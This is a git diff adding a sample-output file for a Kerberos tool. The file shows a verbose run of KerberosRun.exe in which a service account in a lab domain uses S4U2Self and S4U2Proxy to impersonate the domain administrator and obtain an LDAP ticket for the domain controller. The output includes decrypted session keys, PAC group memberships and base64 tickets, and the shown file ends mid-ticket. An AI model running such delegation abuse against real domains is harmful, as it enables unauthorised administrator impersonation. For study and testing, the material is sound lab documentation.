+```
\ No newline at end of file
diff --git a/Authentication/Samples/S4U.md b/Authentication/Samples/S4U.md
new file mode 100644
index 0000000..cb4d275
--- /dev/null
+++ b/Authentication/Samples/S4U.md
@@ -0,0 +1,499 @@
+```powershell
+PS C:\Users> .\KerberosRun.exe --s4u --user spnuseraes --pass [...] --impersonateuser administrator --spn ldap/dc1.corplab.local --verbose                                             
+   __           __
+  / /_____ ____/ /  ___ _______  ___ ______ _____
+ /  '_/ -_) __/ _ \/ -_) __/ _ \(_-</ __/ // / _ \
+/_/\_\\__/_/ /_.__/\__/_/  \___/___/_/  \_,_/_//_/
+
+  v1.0.0
+[*] Starting Kerberos Authentication ...
+[*] Sending AS-REQ ...
+    * MessageType :  KRB_AS_REQ
+    * pvno :  5
+    * PaData :
+       - PA_PAC_REQUEST :
+          - IncludePac :  True
+    * Body :
+       - KdcOptions :  RenewableOk, Canonicalize, Renewable, Forwardable
+       - CName :
+          - Type :  NT_PRINCIPAL
+          - Name :  spnuseraes
+       - Realm :  CORPLAB.LOCAL
+       - SName :
+          - Type :  NT_SRV_INST
+          - Name :  krbtgt
+          - Name :  CORPLAB.LOCAL
+       - Till :  9/13/2037 2:48:05 AM +00:00
+       - RTime :  9/13/2037 2:48:05 AM +00:00
+       - Nonce :  637261656
+       - EType :
+          - EncType :  AES256_CTS_HMAC_SHA1_96
+          - EncType :  AES128_CTS_HMAC_SHA1_96
+          - EncType :  RC4_HMAC_NT
+          - EncType :  RC4_HMAC_NT_EXP
+          - EncType :  RC4_HMAC_OLD_EXP
+       - Addresses :
+          - Type :  NetBios
+          - Addresses :  ADMINSTAT
+       - AdditionalTickets :
+       - EncAuthorizationData :
+       - From :
+[x] Kerberos Error: KDC KDC_ERR_PREAUTH_REQUIRED: Additional pre-authentication required
+[*] Adding encrypted timestamp ...
+[*] Sending AS-REQ ...
+    * MessageType :  KRB_AS_REQ
+    * pvno :  5
+    * PaData :
+       - PA_PAC_REQUEST :
+          - IncludePac :  True
+       - PA_ENC_TIMESTAMP :
+          - EType :  AES256_CTS_HMAC_SHA1_96
+          - kvno :
+          - Cipher :  [ClientEncryptedTimestamp...]
+          - PaTimestamp :  5/27/2020 8:39:14 AM +00:00
+          - PaUSec :  825
+    * Body :
+       - KdcOptions :  RenewableOk, Canonicalize, Renewable, Forwardable
+       - CName :
+          - Type :  NT_PRINCIPAL
+          - Name :  spnuseraes
+       - Realm :  CORPLAB.LOCAL
+       - SName :
+          - Type :  NT_SRV_INST
+          - Name :  krbtgt
+          - Name :  CORPLAB.LOCAL
+       - Till :  9/13/2037 2:48:05 AM +00:00
+       - RTime :  9/13/2037 2:48:05 AM +00:00
+       - Nonce :  637261657
+       - EType :
+          - EncType :  AES256_CTS_HMAC_SHA1_96
+          - EncType :  AES128_CTS_HMAC_SHA1_96
+          - EncType :  RC4_HMAC_NT
+          - EncType :  RC4_HMAC_NT_EXP
+          - EncType :  RC4_HMAC_OLD_EXP
+       - Addresses :
+          - Type :  NetBios
+          - Addresses :  ADMINSTAT
+       - AdditionalTickets :
+       - EncAuthorizationData :
+       - From :
+[*] Receiving AS-REP...
+    * MessageType :  KRB_AS_REP
+    * pvno :  5
+    * PaData :
+       - PA_ETYPE_INFO2 :
+          - EType :  AES256_CTS_HMAC_SHA1_96
+          - S2kParams :
+          - Salt :  CORPLAB.LOCALspnuseraes
+    * CRealm :  CORPLAB.LOCAL
+    * CName :
+       - Type :  NT_PRINCIPAL
+       - Name :  spnuseraes
+    * Ticket :
+       - tkt-vno :  5
+       - Realm :  CORPLAB.LOCAL
+       - SName :
+          - Name :  krbtgt
+          - Type :  NT_SRV_INST
+       - EncryptedPart :
+          - kvno :  11
+          - EType :  AES256_CTS_HMAC_SHA1_96
+          - Cipher :  [krbtgtEncryptedCipher...]
+    * Enc-Part :
+       - kvno :  4
+       - EType :  AES256_CTS_HMAC_SHA1_96
+       - Cipher :  [ClientEncryptedCipher...]
+    * [Decrypted Enc-Part]:
+       - AuthTime :  5/27/2020 8:39:15 AM +00:00
+       - StartTime :  5/27/2020 8:39:15 AM +00:00
+       - EndTime :  5/27/2020 6:39:15 PM +00:00
+       - RenewTill :  6/3/2020 8:39:15 AM +00:00
+       - Nonce :  637261657
+       - Realm :  CORPLAB.LOCAL
+       - SName :
+          - Type :  NT_SRV_INST
+          - Name :  krbtgt
+          - Name :  CORPLAB.LOCAL
+       - EncryptedPaData :
+          - PA_SUPPORTED_ETYPES :
+             - Value : 1F000000
+       - Key :
+          - EType :  AES256_CTS_HMAC_SHA1_96
+          - Value :  63121C531C7D0F825A848F460FA965F7998B43F55075B3E675D5BC420D0DDEAB
+       - KeyExpiration :  9/14/2037 2:48:05 AM +00:00
+       - CAddr :
+          - Type :  NetBios
+          - Addresses :  ADMINSTAT
+       - Flags :  EncryptedPreAuthentication, PreAuthenticated, Initial, Renewable, Forwardable
+       - LastReq
+          - Type :  0
+          - Type :  5/27/2020 8:39:15 AM +00:00
+[+] TGT Kirbi:
+    - doIFHDCCBRigAwIBBaEDAgEWooIEHDCCBBhhggQUMIIEEKADAgEFoQ8bDUNPUlBMQUIuTE9DQUyiIjAgoAMCAQKhGTAXGwZrcmJ0Z3QbDUNPUlBMQUIuTE9DQUyjggPSMIIDzqADAgESoQMCAQuiggPABIIDvDxI+yYhc1dDgzcMyCAvUMxZ0nPIbsohGb1lTRBJCN4copojqrKAJ6hlXg88Owx8RiLgl9oG2LRGHNHNs/qKKVYvNogwmUBXNVVPOWPJhNPMsM+dMoxIaVGGvcCEwsNkmXPlMPFUGbwef0KJFjwV1xfdHfIFltd6J+BUmc7Ky7Z0KT8dHv4RsJAt0yQiIH2JS+ygOdgR5ZqNVCRK600y9VF8ybq1r1lRGCaiCYiajhZVYxZPzSpZgAl/2FMG+FCUhy0D4fPwcKvOYiH01AzmV7sxnFbQnk50SGFDiMyei5xb1C6sgf+soNKnoAX9CDfNcUUbx19i04PxROuRvdQfsLScfTQR4s4GMvX+CE+ZmqumO2rCpkQyvdAqILBsBLTIlrBBZT6nv+6pk+2e8PKv5C38GHqPrxUDoX2FmlNCO904cyc5osntcGUvxgIwzGd75zglxzPOeG5n3J8InAMkCE/6gLO5Vj4kdf3hDJKRGpB0mt8TEoJJ6c7cm1I/a/qrYT7ZrSQpWlDsdm89SuBRzuhg+NVlDxHEYeVujpXI+DjsZOTGl90E98IcKmQFbY8FxA4fytY5wwheIxOqkKIaA20ZBj5TBX+0mqgjKOcKCWqrgOgfemxfKdchaO6Fqgecy2cVk/B5VCJZae8KDzUVUmae1xr5UOX5j9UUJzG/CNeYGQtluOLjEWh3OlOoWExkhLbGuq2oM8Q6nnnUlubmh4tpKI4FEdTqmKBwiZvCPFAnYJvPtwxfaeEHU6K369gi4bwqbPKRRRMBGIoH8mnHot75zX+Lt46wU15q9w6WJ7Q+L/rhnrfY2XANJARAaWbm5VCDq0qvTt23JjRsj7AgKMxxhctlB1Wc+X2JD1n+lpHx6m6oV/MYhgF4nZ254UW36UYDtkzKuGKSZzalF5SinMN9J6t2WMoByatiFvWsYMulX5INeaHeNM3lKhKrE3aSR3VgI8bMi2VvHVB1y0hw6fF2ZTzSskpvoOuYmzbKBkxPnlWd/CcW4SFvKksBGHjVxAu/lnIYowWe1WAlcgRhPbblPO+el7CD6nHRp+ZXsCWMg4CA3PXVJIRSfp6rUTR8AfZVaSCQ7btiaZxjp2d9MlWwEutrv2FuUk/Zhx1xycvKgU2TiFdf7eH2C2+Zy/CAx3AARvgiWp0yT/eCfJmzXHidFLF6Sezl5Zq6LdU3QkOzPUmbFC7gqyzqPhkC4FuLpMdUgYFV9XLOWA2COim4ixUy26L/wH/RHEPP8WZWW2ss2yke9eMf2/fHuNZXo4HrMIHooAMCAQCigeAEgd19gdowgdeggdQwgdEwgc6gKzApoAMCARKhIgQgYxIcUxx9D4JahI9GD6ll95mLQ/VQdbPmddW8Qg0N3quhDxsNQ09SUExBQi5MT0NBTKIXMBWgAwIBAaEOMAwbCnNwbnVzZXJhZXOjBwMFAEDhAAClERgPMjAyMDA1MjcwODM5MTVaphEYDzIwMjAwNTI3MTgzOTE1WqcRGA8yMDIwMDYwMzA4MzkxNVqoDxsNQ09SUExBQi5MT0NBTKkiMCCgAwIBAqEZMBcbBmtyYnRndBsNQ09SUExBQi5MT0NBTA==
+[*] Sending TGS-REQ [S4U2Self] ...
+    * MessageType :  KRB_TGS_REQ
+    * pvno :  5
+    * PaData :
+       - PA_TGS_REQ :
+          - KRB_AP_REQ :
+             - pvno :  5
+             - ApOptions :  Reserved
+             - Ticket :
+                - tkt-vno :  5
+                - Realm :  CORPLAB.LOCAL
+                - SName :
+                   - Type :  NT_SRV_INST
+                   - Name :  krbtgt
+                   - Name :  CORPLAB.LOCAL
+                - EncryptedPart :
+                   - kvno :  11
+                   - EType :  AES256_CTS_HMAC_SHA1_96
+                   - Cipher :  [krbtgtEncryptedCipher...]
+             - Authenticator :
+                - kvno :
+                - EType :  AES256_CTS_HMAC_SHA1_96
+                - Realm :  CORPLAB.LOCAL
+                - SequenceNumber :  637261659
+                - Subkey :
+                   - EType :  AES256_CTS_HMAC_SHA1_96
+                   - KeyValue :  9EB98FD1C195A85E09D01F9B4D4C61DE9A9F12FC20565A2CEFCD67AE4021364D
+                - CTime :  5/27/2020 8:39:15 AM +00:00
+                - CuSec :  90
+                - CName :
+                   - Type :  NT_PRINCIPAL
+                   - Name :  spnuseraes
+                - Checksum :
+                   - Type :  HMAC_SHA1_96_AES256
+                   - Checksum :  5178163FB14DB2095283D269
+                - AuthorizationData :
+                - AuthenticatorVersionNumber :  5
+       - PA_FOR_USER :
+          - UserName :
+             - Type :  NT_ENTERPRISE
+             - Name :  administrator
+          - UserRealm :  CORPLAB.LOCAL
+          - AuthPackage :  Kerberos
+          - Checksum :
+             - Type :  KERB_CHECKSUM_HMAC_MD5
+             - Checksum :  2D6DE2CBFDF408C0845BAAC16C1D4922
+    * Body :
+       - KdcOptions :  EncTktInSkey, RenewableOk, Renewable, Forwardable
+       - Realm :  corplab.local
+       - SName :
+          - Type :  NT_PRINCIPAL
+          - Name :  spnuseraes
+       - Till :  9/13/2037 2:48:05 AM +00:00
+       - RTime :
+       - Nonce :  637261658
+       - EType :
+          - EncType :  AES256_CTS_HMAC_SHA1_96
+          - EncType :  AES128_CTS_HMAC_SHA1_96
+          - EncType :  RC4_HMAC_NT
+          - EncType :  RC4_HMAC_NT_EXP
+          - EncType :  RC4_HMAC_OLD_EXP
+       - EncAuthorizationData :
+       - From :
+       - AdditionalTickets :
+[*] Receiving TGS-REP [S4U2Self] ...
+    * MessageType :  KRB_TGS_REP
+    * pvno :  5
+    * PaData :
+    * CRealm :  CORPLAB.LOCAL
+    * CName :
+       - Type :  NT_ENTERPRISE
+       - Name :  administrator
+    * Ticket :
+       - tkt-vno :  5
+       - Realm :  CORPLAB.LOCAL
+       - SName :
+          - Name :  spnuseraes
+          - Type :  NT_PRINCIPAL
+       - EncryptedPart :
+          - kvno :  4
+          - EType :  AES256_CTS_HMAC_SHA1_96
+          - Cipher :  [ServiceEncryptedCipher...]
+    * Enc-Part :
+       - EType :  AES256_CTS_HMAC_SHA1_96
+       - kvno :
+       - Cipher :  [SubSessionKeyEncryptedCipher..]
+    * [Decrypted Enc-Part]:
+       - AuthTime :  5/27/2020 8:39:15 AM +00:00
+       - StartTime :  5/27/2020 8:39:15 AM +00:00
+       - EndTime :  5/27/2020 6:39:15 PM +00:00
+       - RenewTill :  6/3/2020 8:39:15 AM +00:00
+       - Nonce :  637261658
+       - Realm :  CORPLAB.LOCAL
+       - SName :
+          - Type :  NT_PRINCIPAL
+          - Name :  spnuseraes
+       - EncryptedPaData :
+       - Key :
+          - EType :  AES256_CTS_HMAC_SHA1_96
+          - Value :  D9A94A6FD359710193DBDD0FF87DD672F217CA96413833D2C0B2095CF9F00DF2
+       - KeyExpiration :
+       - Flags :  EncryptedPreAuthentication, PreAuthenticated, Renewable
+       - LastReq
+          - Type :  0
+          - Type :  5/27/2020 8:39:15 AM +00:00
+    * [Decrypted Ticket Enc-Part]:
+       - AuthTime :  5/27/2020 8:39:15 AM +00:00
+       - StartTime :  5/27/2020 8:39:15 AM +00:00
+       - EndTime :  5/27/2020 6:39:15 PM +00:00
+       - RenewTill :  6/3/2020 8:39:15 AM +00:00
+       - CRealm :  CORPLAB.LOCAL
+       - CName :
+          - Type :  NT_ENTERPRISE
+          - Name :  administrator
+       - AuthorizationData :
+          - Type :  AdIfRelevant
+             - Type :  AdWin2kPac
+                - Type :  AdWin2kPac
+                - Version :  0
+                - LogonInfo :
+                   - PacType :
+                   - DomainId :
+                      - Revision :  1
+                      - IdentifierAuthority :  NTAuthority
+                      - SubAuthority :  21, 1977317821, 1772133574, 954835042
+                      - SubAuthorityCount :  4
+                   - ExtraIds :
+                      - Attributes :  SE_GROUP_MANDATORY, SE_GROUP_ENABLED_BY_DEFAULT, SE_GROUP_ENABLED
+                      - Sid :  S-1-18-2
+                      - Revision :  1
+                      - IdentifierAuthority :  AuthenticationAuthority
+                      - SubAuthority :  2
+                      - SubAuthorityCount :  1
+                   - DomainSid :
+                      - Attributes :  0
+                      - Id :  954835042
+                      - Value :  S-1-5-21-1977317821-1772133574-954835042
+                   - ExtraSidCount :  1
+                   - ExtraSids :
+                      - Id :  2
+                      - Attributes :  0
+                      - Value :  S-1-18-2
+                   - GroupCount :  5
+                   - GroupId :  513
+                   - GroupIds :
+                      - RelativeId :  512
+                      - Attributes :  SE_GROUP_MANDATORY, SE_GROUP_ENABLED_BY_DEFAULT, SE_GROUP_ENABLED
+                      - RelativeId :  513
+                      - Attributes :  SE_GROUP_MANDATORY, SE_GROUP_ENABLED_BY_DEFAULT, SE_GROUP_ENABLED
+                      - RelativeId :  520
+                      - Attributes :  SE_GROUP_MANDATORY, SE_GROUP_ENABLED_BY_DEFAULT, SE_GROUP_ENABLED
+                      - RelativeId :  518
+                      - Attributes :  SE_GROUP_MANDATORY, SE_GROUP_ENABLED_BY_DEFAULT, SE_GROUP_ENABLED
+                      - RelativeId :  519
+                      - Attributes :  SE_GROUP_MANDATORY, SE_GROUP_ENABLED_BY_DEFAULT, SE_GROUP_ENABLED
+                   - GroupSid :  S-1-5-21-1977317821-1772133574-954835042-513
+                   - GroupSids :
+                      - Id :  512
+                      - Attributes :  SE_GROUP_MANDATORY, SE_GROUP_ENABLED_BY_DEFAULT, SE_GROUP_ENABLED
+                      - Value :  S-1-5-21-1977317821-1772133574-954835042-512
+                      - Id :  513
+                      - Attributes :  SE_GROUP_MANDATORY, SE_GROUP_ENABLED_BY_DEFAULT, SE_GROUP_ENABLED
+                      - Value :  S-1-5-21-1977317821-1772133574-954835042-513
+                      - Id :  520
+                      - Attributes :  SE_GROUP_MANDATORY, SE_GROUP_ENABLED_BY_DEFAULT, SE_GROUP_ENABLED
+                      - Value :  S-1-5-21-1977317821-1772133574-954835042-520
+                      - Id :  518
+                      - Attributes :  SE_GROUP_MANDATORY, SE_GROUP_ENABLED_BY_DEFAULT, SE_GROUP_ENABLED
+                      - Value :  S-1-5-21-1977317821-1772133574-954835042-518
+                      - Id :  519
+                      - Attributes :  SE_GROUP_MANDATORY, SE_GROUP_ENABLED_BY_DEFAULT, SE_GROUP_ENABLED
+                      - Value :  S-1-5-21-1977317821-1772133574-954835042-519
+                   - HomeDirectory :
+                   - HomeDrive :
+                   - KickOffTime :  1/1/0001 12:00:00 AM +00:00
+                   - LastFailedILogon :  1/1/1601 12:00:00 AM +00:00
+                   - LastSuccessfulILogon :  1/1/1601 12:00:00 AM +00:00
+                   - LogoffTime :  1/1/0001 12:00:00 AM +00:00
+                   - LogonCount :  144
+                   - LogonScript :
+                   - LogonTime :  5/27/2020 8:09:42 AM +00:00
+                   - ProfilePath :
+                   - PwdCanChangeTime :  5/20/2020 3:37:53 AM +00:00
+                   - PwdLastChangeTime :  5/19/2020 3:37:53 AM +00:00
+                   - PwdMustChangeTime :  1/1/0001 12:00:00 AM +00:00
+                   - Reserved1 :  0, 0
+                   - Reserved3 :  0
+                   - ResourceDomainId :  S-1-5-21-1977317821-1772133574-954835042
+                   - ResourceDomainSid :  S-1-5-21-1977317821-1772133574-954835042
+                   - ResourceGroupCount :  1
+                   - ResourceGroupIds :  System.Collections.Generic.List`1[Kerberos.NET.Entities.Pac.GroupMembership]
+                   - ResourceGroups :
+                      - Attributes :  SE_GROUP_MANDATORY, SE_GROUP_ENABLED_BY_DEFAULT, SE_GROUP_ENABLED, SE_GROUP_RESOURCE
+                      - Id :  572
+                      - Value :  S-1-5-21-1977317821-1772133574-954835042-572
+                   - SubAuthStatus :  0
+                   - UserAccountControl :  ADS_UF_LOCKOUT
+                   - UserDisplayName :
+                   - UserFlags :  LOGON_EXTRA_SIDS, LOGON_RESOURCE_GROUPS
+                   - UserId :  500
+                   - UserName :  Administrator
+                   - UserSessionKey :  00000000000000000000000000000000
+                   - UserSid :  S-1-5-21-1977317821-1772133574-954835042-500
+                   - DomainName :  CORP
+                   - ServerName :  DC1
+                   - BadPasswordCount :  0
+                   - FailedILogonCount :  0
+                - ClientInformation :
+                   - PacType :  CLIENT_NAME_TICKET_INFO
+                   - ClientId :  5/27/2020 8:39:15 AM +00:00
+                   - Name :  administrator
+                   - NameLength :  26
+                - KdcSignature :
+                   - PacType :  0
+                   - RODCIdentifier :  0
+                   - Signature :  D4A5267BD2ED031BB92EFF09
+                   - SignatureData :  [...]
+                   - Type :  HMAC_SHA1_96_AES256
+                   - Validated :  False
+                   - Validator :
+                      - Validator :  PaForUserChecksum
+                      - Validator :  D4A5267BD2ED031BB92EFF09
+                - ServerSignature :
+                   - PacType :  0
+                   - RODCIdentifier :  0
+                   - Signature :  8FDF86EF566283E29F620450
+                   - SignatureData :  [...]
+                   - Type :  HMAC_SHA1_96_AES256
+                   - Validated :  False
+                   - Validator :
+                      - Validator :  PaForUserChecksum
+                      - Validator :  8FDF86EF566283E29F620450
+                - UpnDomainInformation :
+                   - PacType :  UPN_DOMAIN_INFO
+                   - Upn :  Administrator@corplab.local
+                   - UpnLength :  54
+                   - UpnOffset :  16
+                   - Domain :  CORPLAB.LOCAL
+                   - DnsDomainNameLength :  26
+                   - DnsDomainNameOffset :  72
+                - DecodingErrors :
+                - HasRequiredFields :  True
+       - CAddr :
+       - Flags :  EncryptedPreAuthentication, PreAuthenticated, Renewable
+       - Key :
+          - EType :  AES256_CTS_HMAC_SHA1_96
+          - Value :  D9A94A6FD359710193DBDD0FF87DD672F217CA96413833D2C0B2095CF9F00DF2
+       - Transited :
+          - Type :  DomainX500Compress
+          - Contents :
+[+] TGS Kirbi:
+    - doIFbDCCBWigAwIBBaEDAgEWooIEdDCCBHBhggRsMIIEaKADAgEFoQ8bDUNPUlBMQUIuTE9DQUyiFzAVoAMCAQGhDjAMGwpzcG51c2VyYWVzo4IENTCCBDGgAwIBEqEDAgEEooIEIwSCBB90w8gOCVI9ALldQaJ3xkObyV6UFqBCP7rrw6Bp0VajksVP8CpTN9bE2ZvbmzqxuHNknr0ks0G39Z3/QNE9j3bJx4dAf1U2RrYnibG3uf2WwM+gTiCO1XZtCeT+upixWvS0fLeJmaPEiSP263AOp9jEU5F5ckyKLY2/oJfLjKMiOVCfg7llrDcqBdM0M7F/QbQ93BMZ4q0eXAY+5RJcbvppCM/emYPRVYxwXwqcaS1hOCUdCJ9Llrd2DqGPDgQj6Lk6dd6XIkVm1Pm2QkZCeKFdtUka5lovX06TkFf7C7jgTl7F3Aq+HmYOX39rinawj0MZZ375W8Wof4GhG0qPEZr1PY5UP9xlANM12EenVSdQIfeyl+V3eg7kJ8oYA1kXlOg8cSi92k9KiGm4R8nPa5l2eWifMoax9YpW39WmI6lWnxIE1zKu/Pm1tjGtgqu9RRta7eRwsPHIFe945zwEwU+rmMV0Ox9A4J06Wn918KJrbu//R5d8iqFx2fjrs6hijNOLNMOTtKbtU8yr5t8FJ07nRW2JdJQlZVulydlk4H3qTKfkextRKOj25HAJ7MfS00QBl82m5jLkPRpY0RIJ40+FSaUnblxWNkz/ZzqQvc+XevSnFB4YHbjexVl+0kczEjUeKlH7DxmsMlUjsQ85682pkZmq+xw70aean5zC57OWGE2wRNDyXIKVmeE2FUpMsF0J4jjMna3MphdfFYAIe9ysPfrRWSCY4dgZ4IzoZzwC62HxLZvdAIGu9CPthjqNhnnJtGw+eEtVxwbxOe70DaheX8mlI9buU5NEqD8BKj40eyrVlrAlSI6ie4JAG0CQAqnEUCrtTmycsBkHzRumUlXBdnRjUuKEIFxbSCTmQj7EtG1qzVVeSZX1EfwqjdnBcpdIctj/jDEunGBKEEzfJhJLKY4QA1IHt/+7UGz93Kfv8RAp3AUHbVwJaf433lUIFkOQOl5wL8OLsThWEUP9nmM1RoBOJeaUQTVnX0VtikBhr9rvMV+38fLxAB0NOYnHWN1QvBgYiST6jTef9IplS1EDPsBgrGFNftQFyEZFadNKbm8rs8mahHkNZfTEKenilEeqp+ShREvB0ZdWz8q3ffZLWwkpnFHhsMSkgRiEq6LVEI/TUySx+/gBXsJK3SRqifemHdG/eLUfTsH0oJ4x0quufSz2BzMlUMjcQuFb+bYCGlvlUIwgz8v5oJYa1WrfcYgaVmWZJmP/43FiEY8xSbIr66zdNav3I0X4y1CJwtqqSw+OKUA++ys8Ljqfxkbz8wjfWWQx3za1v6RNKQOc+oQbpNTtNYG+5qO/b98dRbGEim8qq0hPQruFxwm6tS2YKSYLzRGrb8RbW33I+8TPRV7cD9ank4aKxPXFkYTv6GFEHbaa+Qc8DLP5l5MlTHtC2aOB4zCB4KADAgEAooHYBIHVfYHSMIHPoIHMMIHJMIHGoCswKaADAgESoSIEINmpSm/TWXEBk9vdD/h91nLyF8qWQTgz0sCyCVz58A3yoQ8bDUNPUlBMQUIuTE9DQUyiGjAYoAMCAQqhETAPGw1hZG1pbmlzdHJhdG9yowcDBQAAoQAApREYDzIwMjAwNTI3MDgzOTE1WqYRGA8yMDIwMDUyNzE4MzkxNVqnERgPMjAyMDA2MDMwODM5MTVaqA8bDUNPUlBMQUIuTE9DQUypFzAVoAMCAQGhDjAMGwpzcG51c2VyYWVz
+[*] Sending TGS-REQ [S4U2Proxy] ...
+    * MessageType :  KRB_TGS_REQ
+    * pvno :  5
+    * PaData :
+       - PA_TGS_REQ :
+          - KRB_AP_REQ :
+             - pvno :  5
+             - ApOptions :  Reserved
+             - Ticket :
+                - tkt-vno :  5
+                - Realm :  CORPLAB.LOCAL
+                - SName :
+                   - Type :  NT_SRV_INST
+                   - Name :  krbtgt
+                   - Name :  CORPLAB.LOCAL
+                - EncryptedPart :
+                   - kvno :  11
+                   - EType :  AES256_CTS_HMAC_SHA1_96
+                   - Cipher :  [krbtgtEncryptedCipher...]
+             - Authenticator :
+                - kvno :
+                - EType :  AES256_CTS_HMAC_SHA1_96
+                - Realm :  CORPLAB.LOCAL
+                - SequenceNumber :  637261661
+                - Subkey :
+                   - EType :  AES256_CTS_HMAC_SHA1_96
+                   - KeyValue :  C63DC6F032F6FE1D673F32166377B3F0C7908DAB3425FDD49E313997FB4C254D
+                - CTime :  5/27/2020 8:39:15 AM +00:00
+                - CuSec :  512
+                - CName :
+                   - Type :  NT_PRINCIPAL
+                   - Name :  spnuseraes
+                - Checksum :
+                   - Type :  HMAC_SHA1_96_AES256
+                   - Checksum :  4EB87A9E16524D72C6F71B95
+                - AuthorizationData :
+                - AuthenticatorVersionNumber :  5
+       - PA_PAC_OPTIONS :
+          - Flags :  ResourceBasedConstrainedDelegation
+    * Body :
+       - KdcOptions :  RenewableOk, CNameInAdditionalTicket, ConstrainedDelegation, Renewable, Forwardable
+       - Realm :  corplab.local
+       - SName :
+          - Type :  NT_SRV_INST
+          - Name :  ldap
+          - Name :  dc1.corplab.local
+       - Till :  9/13/2037 2:48:05 AM +00:00
+       - RTime :
+       - Nonce :  637261660
+       - EType :
+          - EncType :  AES256_CTS_HMAC_SHA1_96
+          - EncType :  AES128_CTS_HMAC_SHA1_96
+          - EncType :  RC4_HMAC_NT
+          - EncType :  RC4_HMAC_NT_EXP
+          - EncType :  RC4_HMAC_OLD_EXP
+       - EncAuthorizationData :
+       - From :
+       - AdditionalTickets : (S4U2Self Ticket)
+          - tkt-vno :  5
+          - Realm :  CORPLAB.LOCAL
+          - SName :
+             - Name :  spnuseraes
+             - Type :  NT_PRINCIPAL
+          - EncryptedPart :
+             - kvno :  4
+             - EType :  AES256_CTS_HMAC_SHA1_96
+             - Cipher :  [ServiceEncryptedCipher...]
+[*] Receiving TGS-REP [S4U2Proxy] ...
+    * MessageType :  KRB_TGS_REP
+    * pvno :  5
+    * PaData :
+    * CRealm :  CORPLAB.LOCAL
+    * CName :
+       - Type :  NT_ENTERPRISE
+       - Name :  administrator
+    * Ticket :
+       - tkt-vno :  5
+       - Realm :  CORPLAB.LOCAL
+       - SName :
+          - Name :  ldap
+          - Type :  NT_SRV_INST
+       - EncryptedPart :
+          - kvno :  7
+          - EType :  AES256_CTS_HMAC_SHA1_96
+          - Cipher :  [ServiceEncryptedCipher...]
+    * Enc-Part :
+       - EType :  AES256_CTS_HMAC_SHA1_96
+       - kvno :
+       - Cipher :  [SubSessionKeyEncryptedCipher..]
+    * [Decrypted Enc-Part]:
+       - AuthTime :  5/27/2020 8:39:15 AM +00:00
+       - StartTime :  5/27/2020 8:39:15 AM +00:00
+       - EndTime :  5/27/2020 6:39:15 PM +00:00
+       - RenewTill :  6/3/2020 8:39:15 AM +00:00
+       - Nonce :  637261660
+       - Realm :  CORPLAB.LOCAL
+       - SName :
+          - Type :  NT_SRV_INST
+          - Name :  ldap
+          - Name :  dc1.corplab.local
+       - EncryptedPaData :
+          - PA_PAC_OPTIONS :
+             - Flags :  ResourceBasedConstrainedDelegation
+       - Key :
+          - EType :  AES256_CTS_HMAC_SHA1_96
+          - Value :  17A6266461838F56F7B2B7A3C31ABD59ECED7B93FC4B8960CE9F8E32B08D4178
+       - KeyExpiration :
+       - Flags :  EncryptedPreAuthentication, OkAsDelegate, PreAuthenticated, Renewable, Forwardable
+       - LastReq
+          - Type :  0
+          - Type :  5/27/2020 8:39:15 AM +00:00
+[+] TGS Kirbi:
+    - doIGPjCCBjqgAwIBBaEDAgEWooIFOTCCBTVhggUxMIIFLaADAgEFoQ8bDUNPUlBMQUIuTE9DQUyiJDAioAMCAQKhGzAZGwRsZGFwGxFkYzEuY29ycGxhYi5sb2NhbKOCBO0wggTpoAMCARKhAwIBB6KCBNsEggTX9tzhZ/IADMhIKTr9En8R+s8kPL7wNbX7jaIcIH86U6Y4MHTe67B1yqi9fjJgQstIBEQVEMybm2pTfA3LKeBcDEzr47APIY4Sz7WTXtrc69LKphJoHGMAfW2SxHjNFBV8Oovejn0DRbqTMqXuZinXc7+5hKutQuGEagJIQU6KR5xpNdPUdOGcrQcK1EtVqVwouD9rbify/8+1Kl6k5eseQqU9aVy+osDTo8VPK3o82QsW0TvrwRYxCEy0WzUDAMoUvQ0h+5Wb/1PTOkAQ3i265btjiCyz6O/R8LF+A1LyjnXAfQmkfu0G2EG++rYsJN2fjGGo1wYxILKPMZ34y0hdySEsIPQ1KtNjRLk45JMvh5+pj8Bh7vhFSHrNmXf24s/6LWiSldeatoZpJsdXt6YycE6mdEajFyhGlyijjx4T5tAiT/JPscpRuvAPI8Kb23tsUbJ0Ixaya8ECgeluujhRRKb6O9Z1BmXYLQtntr43ii2ZRZ38wl0oHLHqwUzAXQpLT3ICZnMPLKPG5z08WGWLSddGJwASTCCKGkBhIjaHxeMQah4USZyGLm5ByuXKtCc7feoMLgY5kTHKZL76A9ESAN/Cg0ykF10SQxK/5+HHIoTl+wAAHOSf0rjSkhpFPiY39oe2YRp3NXe16f/2NPsfPEvwq3ucInzJe08bumZy7RWMMgufbTjWTcPY0uBKwRU/mFAzYHdaxkjE/qCRycXBSO3wWaMfmNHY+jEmbHV/Iary3k+Bnptx5n8hugVUcuQ7Voc2W1hlxM85+D4sIBdxQsK52A411Qa9amrfFnfWbFGbeNQaWrrOA0a1z3LCXJ5tLyBsX7TV0lqmntC0ybDGf9rWESPYuGTRHKfnWP2H2XHVduEmC3hA6wQVEVKdvvcVvaqTHvDGdtk9n565xiThcQXs3cP211t6jeeAlkLU9b+k2hjzD2aJj0P63QXdZyQHwyhACQwFC0FSlyXa7Ncdgk4fPeMYvL6kduDNTa5Tib7K1jzlVSZ244CvSvcCDtToZeNE+XTj9G0VGEWUDvuRnWD/2CZ7srWWZcdCRBUojepbPTpi5iSbLJn2UeKH8m3BdBZ+UPJInx99D1YAZOSRIwhq3Ynxhzr3XDT4s+pZb1bMB6WPp1XEXzyC768D2HzF3DhFCfy40BU/tlhiJWYLjE5zD6jIGGrPNrWhYrQJCtcFhmmnHoIIn1W24aCNEhDJaDnrof3yanlFWM427WFN6yGW9keNxhWYbuQ4gL2bGmmhTxoo0dJqr/17RuNTo80eXQ7V15cBCzculbmeURiRKHjFDc2tJgKBvCXDkjX8G5USeWcsTIf2kNjXMESMpdHI2U5R3Rckoke0ndkJwOeAXHpSLvPh8h0YEUMAiJdqEh332KzmzOp0SFswDrWltMmZoZ84hh5aeITaemdu7xYv5owk8ZuZQQnwsTovJ9Xf+eRAwmSvPFuTnAasaf/MaDjLmWJ7hi18I1zVYVXfZhqxARJJCdn1doM8u0Y5xuNfYqnXK5IyIgN1a+TGPM8OdhH5exr/oOGROcThjqRqdYnMrdR0mkCMgzM5O4RgzAMRHGE0WNmHYjFjvReghFxyV1PDTX8ojoHPgpTX3f7/uUEqoZMR9l0i4TbwgD0ciUlFtP+NhtlfxbI5o4HwMIHtoAMCAQCigeUEgeJ9gd8wgdyggdkwgdYwgdOgKzApoAMCARKhIgQgF6YmZGGDj1b3srejwxq9Wezte5P8S4lgzp+OMrC